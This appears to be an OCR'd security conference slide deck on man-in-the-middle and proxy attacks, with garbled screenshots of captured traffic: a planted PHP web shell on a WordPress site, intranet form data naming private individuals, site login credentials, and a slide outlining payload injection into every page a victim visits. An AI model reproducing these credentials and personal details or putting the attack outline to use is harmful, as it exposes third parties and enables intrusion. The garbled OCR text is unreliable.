1:42:41 PM 


2/29/2012 
1:43:25 PM 


Black Christmas movie review- 


Movies 


S0.06 


2/29/2012 
1:40:20 PM 


2/29/2012 
1:41:45 PM 


2/29/2012 
1:42:25 PM 


Cultivate a Positive Mind -Set Through Meditation 


Meditation 


50.05 


2/29/2012 
1:40:05 PM 


2/29/2012 
1:40:20 PM 


2/29/2012 
1:41:41 PM 


5 Tips To Help You Master Digital Photography 


Photography 


SO. 04 


2/29/2012 
1:30:37 PM 


2/29/2012 
1:39:34 PM 


2/29/2012 
1:39:56 PM 


Modern hand Analysis : What's In It For us? 


Spirituality 


SO. 05 


2/29/2012 
1:37:40 PM 


2/29/2012 
1:30:36 PM 


2/29/2012 
1:39:31 PM 


Methods for photo backups 


Photography 


S0.05 


2/29/2012 
1:36:47 PM 


2/29/2012 
1:37:40 PM 


2/29/2012 
1:30:30 PM 


Soothing Music: The Native American Flute 


Music 


SO. 04 


2/29/2012 
1:36:05 PM 


2/29/2012 
1:36:40 PM 


2/29/2012 
1:37:27 PM 


What does it mean to be an expatriate? Part 2 - 
How to choose your paradise 


Coaching 


S0.05 


2/29/2012 
1:35:39 PM 


2/29/2012 
1:36:05 PM 


2/29/2012 
1:36:42 PM 


Diabetes Epidemic because of self-inflicted Obesity 


Diabetes 


S0.06 


2/29/2012 
1:35:12 PM 


2/29/2012 
1:35:30 PM 


2/29/2012 
1:36:01 PM 


The Poor Man's Guide To Rich Looking Videos 


Marketing 


SO. 07 


2/29/2012 
1:34:56 PM 


2/29/2012 
1:35:11 PM 


2/29/2012 
1:35:35 PM 


World s Hottest Hot Sauce - Blair's 16 Million 
Reserve 


Food and 
Beverage 


S0.05 


2/29/2012 
1:34:14 PM 


2/29/2012 
1:34:56 PM 


2/29/2012 
1:35:00 PM 
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HaxOrs and defacers.... 





H 73 1 63 27 1 70 www .trend w p. co m 


actiDn= 




newdirname= 




d ir=/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css 




newperm= 




pfile= 




d ir=/h d me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css 




sname= 




tofite= 




d ir=/h d me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css 




okiname= 




newfilename= 




d ir=/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css 




action= 




opfile= 




dir= 




view_writable=0 




d ir=/h o me/trend/pu blic_html/, 




=Grt 




uploadflle= 




doupfile=Yukle 




uploaddir=./ 




dr=V 




action=file 




theflle= 




doing= 




d ir=/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css 




d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/E 




d l[/h d me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/E 




d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/E 




d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/E 




d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/c 




d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/e 




d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/css/e 




d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/)! 




d l[/h o me/trend/pu blic_html/d emo/trend h a ber/w p-in clud es/css/j< 




d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/cssA 




d l[/h o me/trend/pu b lic_html/d emo/trend h a ber/w p-in clud es/cssA 




ch kail - on 
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...hacking... 



Q Hacked BySkyNet 




<- CO www.trendwp.corn 



* <* ^ 



A| Esta pagina esta escrita en 



turco t 



iQuierestrad. 



Traducir 



No 



Configuration ▼ 



Sitede BuLmau B'^'^a T e malar %25 Itidirim ile SatiLmaktadir. Boyle Para Gozlere IoaumayitiLZ. 3 
5 Kuril si uk Tern La rat Verdigi Fiyata Bakia Gelin Sizlere bakki Neyse O Sekilde Verio ve O Lis an 
Her T^rl" 1 So run da Hizmeriuizdeviz. 



ILetisim Icin: By_BaRaK@Hotmail.De 
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. . and hacked 



; O SkyNet I Casus Shell 

GO wwwtrendwp.com/demo/trendhaber/wp-includes/css/casus.php 
Sa] Esta pagina esta escrita en 



turco ^ 



iQuieres traducirla? 



Traducir 



No 



Configuracion ▼ 



www.trendY/p.com (77.223.130.22) 

Cikis I Ana Dizin I MySQL Baqlan I MySQL Yukle & Indir I Komut Calistir I PHP Bilgisi I Eval PHP Kod I Back Connect 

Dosya Yoneticisi - Gecerli Disk Ucretsiz 91.95 G of 431.72 G (21.3%) 

Bulundugun Dizin (Writable, 0755} 



PhpSpyVer: 2010 
Safe Mode:Yes 



/h o m e/tre n d/p u b I i c_htm l/d e m o/tre n d h a b e r/wp-i n cl u d e s/cs si 



Ana Dizin | Yazilabilir Goster | Dizin Olusturmak | Dosya Olustur 



j Seleccionar archivo | No se ha ... archive 





Aff 


Son Degistirilme 


Boyut 


Chmod 


Isle-rn 


= Ust Dizin 




□ 


admin-bar-rtl.css 


2012-02-10 00:21:07 


2.95 K 


0644/-rw-r-r- 


Indir I Kooyala I Duzenle I Yeni Ad I Zaman 












□ 


admin-bar-rtl.dev.css 


2012-02-10 00:21:07 


3.48 K 


0644/-rw-r-r- 


Indir I Kooyala I Duzenle I Yeni Ad I Zaman 












□ 


admin-bar. ess 


2012-02-10 00:21:07 


10.67 K 


0644/-rw-r-r- 


Indir I Kopyala I Duzenle I Yeni Ad I Zaman 













Elements "{^] Resources I <@ Network I ^ Scripts (^Timeline ^ Profiles '^Audits Console 



Search Network 



fJame 

Path 



<> 



casus. php * 

/d emo/tren d h a ber/w p— in elude I ^ 



© 



Headers Preview Response Cookies Timing 



Request URL: http: // jino.ji .f unpic .org/lq/security . js 
Request Method: GET 
Status Code: £464 Not Found 
▼ Request Headers view source 



© © ( Cocumen:s Stylesheets Images Scripts XHR Fon:s WebSockets 0:her 



Intranets 



1S9.254. 133.50 CDlon nDmbreCompleto=LIC. GUSTAVO MUNOZ DOMINGUEZ 

folio So liortu d = 
estadoAvaluo=CP 
f ech a C rea cio n = 1 /0 3/20 1 2 
cv eCatastra l= 0S60 OSO 040 
=bcc 

nomPropCompleto=FELIPA CAMACHO REYES 

su pCD n stru ccio n = 1 6 S . 87 

su pTerren □ =790 .97 

g iro = H AB TACIO N AL 

rag imen = PARIICU LARE S 

lote=Q04 

manzana=00S 

tipoAvaluo=AN 

anioRef=0 

tipoQperacion=2 

supTerrenoEsc= 

numColonia=1-C 

tipoCalle=1 

numCalle=-1 

numExt=6 

numlnt= 

codigoPost=27-10 
ubieacion = 
imagen = 
=Subir Croquis 
=Graba Solicitud 
=Votver 
mDde=nueva 



189.254.1 33.50 colon usuario web=N0T9 



;eb=GUS~AVO09 
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And, of course, PrOn 



HalUiii (lihujo: 
en uiih i^K sLi 

El desmtmtaj* dVf 

rjtpcdala rn 1 air nria ha 
torprtndida a todat con un 

prDcr so dc r*rioijracricjn del 
t\T\pto. San aparrcido 
tnanodF simM&f fttiicoa dt 
win fttnMtorf, mpcfrlw y 

fold. 



prnes de It ace 700 alios 





Eat* no #i cl cuo unira y ximllam ilua.lrn.rio 11 hin 

oparceido il Inktkurs* tabor*? renovation en ftdirVLo* 
ajitJ^LLij-* Lihc ln\.r m!u 1 lira-, l^t^sJjiv 



DIBUJAR PENES 

Incluso una iglasia as buan lugar para sacarhj Da Vinci interior 
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[+] [-] chaturbate.com 



2 forms 



S525 1ttB 154 csrf middle wa retaken =ac23ebbeSE^b7??sdddcbb-GME3ca 30 

M=guy4gals 

rernemberme=on 
= login 

n ext=/a ceo u ntsAeg ister/ 

csrfmlddlewaretDken=ac23ebbeSE-b733edddcbri4041 53ca9Q 
= undefined 

|=lolitata 
-wolverine 




birthday_month=4 

birthday_day=- 

birthday_year=13S6 

gender=f 

terms=on 

coreg_xp=on 

=Create Free Account 



122 164 227 37 csrfmiddle waretoken=ac23ebbe5E-b733edddcbb-uM E3ca9Q 

I=guy4gals 
IS |= wolverine 
rememberme=on 
=lo gin 

next=/auth/login/ 
next= 

csrfmiddlewaretoken=ac23ebbeSE-b733edddcbb4041 53ca90 
= undefined 

I=guy4gals 
IB B= wolverine 
rememberme=on 
=lo gin 
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Do Payloads: Infect webs for 
the future 




H Tuenti 

<r GO www.tu enti . c o m/? m = o g : n 



Qtuenb 



Social 

Conectate. comparte y comunicate con tus 



J con lengua 

wmm iQue es Tuenti? 

Tuenti es una plataforma social privada que 
utilizan millonesde personam para cornunrcarse^ 
entre eHas y compartir information .' 



^ E i HRec 

&.cerca de Empleo ^nun 



Paginas oficiales 



Local ^Has alvkJado tu cc ntra sen a? 

nsa Btoa Oesarrolladares Ayuda Po-litica de privacidad Legal 
DescuDre servicios focales y participa con fas 

marcas que realmente tajmportan 

O ^Quieres una cuenta? Regrstrate 



Movil 

T Accede a Tuenti 



M^de fu 



& BBVA GsGB 

movil en tjempo real 



|Ojj Elements 



Resources 



(w) Network ^Scripts (j^f Timeline ^Profiles Audits 



i Con sale 



Search Network 



Name 

Path 



Method Status Type 



Initiator 



Size 



Time 



Content Latency 



Timeline 



i 



ad.yiehima n ag er. com 



GET 



302 
Pilcived Ti 



I static.tjenti.com 

J I static.tuenti.com 



GET 



□ 
□ 



goocjleacls.cj.cloubleclick.net 

go c glea is. g.dou bleclick. n et'pa gea IMewth ro u gh con ve rsio n/1 034 | 
P 

b.s co reca rd resea rch . cc m 
gmatcher 



GET 



GET 



n_nry*l tfiuitpmwfei r-nm 

>z I I := I • s 



GET 



200 

OK 

200 

OK 

200 

OK 

200 



undefined 

a pplicatio n/x-ja vascript 

image/gif 

image/gif 

image/gif 



/?m=login:B 

Script 

/?m=login:11 

Parser 

http://www.coo 

Redirect 

/?m=login:3 

Parser 



1.05KB 456ms 

OB 454ms 

49.51 KB 734ms 

155.49KE 269ms 
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Targeting Attacks 



• Select the Target 

• Bank 

• Social Network 

• Intranet 

• Analyze loaded files 

• Payload: 

• Inject and load a infected file for that target, in 
every web the victim visits. 

• Profit. 
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Demo Facebook 
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Protections 



• Take care of mitm 
schemas 

Proxy 

• TOR networks 

• After using them, clean 
all 

Cache is not your friend 
on the Internet 

VPNs is not a silver bullet 
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Questions? 

chema@informatica64.com 
mfernandez@informatica64.com 
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